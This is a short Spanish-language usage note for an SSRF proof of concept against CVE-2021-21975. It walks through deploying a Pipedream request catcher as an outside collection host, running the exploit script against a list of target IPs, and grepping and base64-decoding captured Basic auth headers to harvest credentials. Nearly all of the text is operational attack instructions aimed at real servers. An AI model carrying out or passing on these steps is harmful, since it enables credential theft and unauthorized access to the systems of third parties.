
#SSRF-POC - ssrf a fuga de credenciales
#Primero configura el cliente pd.
#Ahora ejecuta ./pd deploy http-new-requests
#ahora reemplaza la solicitud http de pipedream, p. ej.: Randomstring.m.pipedream.net, en el script
#ejecuta esto en una terminal separada - ./pd logs new-requests | tee -a req.txt
#y ahora ejecuta esto en otra terminal - python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt
"Esta es una prueba de concepto temprana creada cuando la vulnerabilidad se hizo pública hace unos meses, así que úsala bajo tu propio riesgo." :V
#crédito @wabaf3t @D0rkerDevil